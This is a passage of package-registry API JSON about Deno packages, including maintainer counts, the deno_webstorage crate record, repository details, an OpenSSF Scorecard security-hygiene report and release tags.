poalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-x64/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-x64/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-x64/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-x64/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-x64/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-x64/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://maven-central.storage-download.googleapis.com/maven2","ecosystem":"maven","default":true,"packages_count":620154,"maintainers_count":0,"namespaces_count":82381,"keywords_count":36851,"github":"maven-central","metadata":{"funded_packages_count":48065,"rate_limit":2},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-09-01T05:04:44.165Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":4047892,"name":"deno_webstorage","ecosystem":"cargo","description":"Implementation of WebStorage API for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":253,"first_release_published_at":"2021-05-11T20:40:02.231Z","latest_release_published_at":"2026-08-06T11:45:05.668Z","latest_release_number":"0.252.0","last_synced_at":"2026-08-29T21:57:56.240Z","created_at":"2022-04-12T10:02:56.012Z","updated_at":"2026-08-31T13:36:09.780Z","registry_url":"https://crates.io/crates/deno_webstorage/","install_command":"cargo install deno_webstorage","documentation_url":"https://docs.rs/deno_webstorage/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-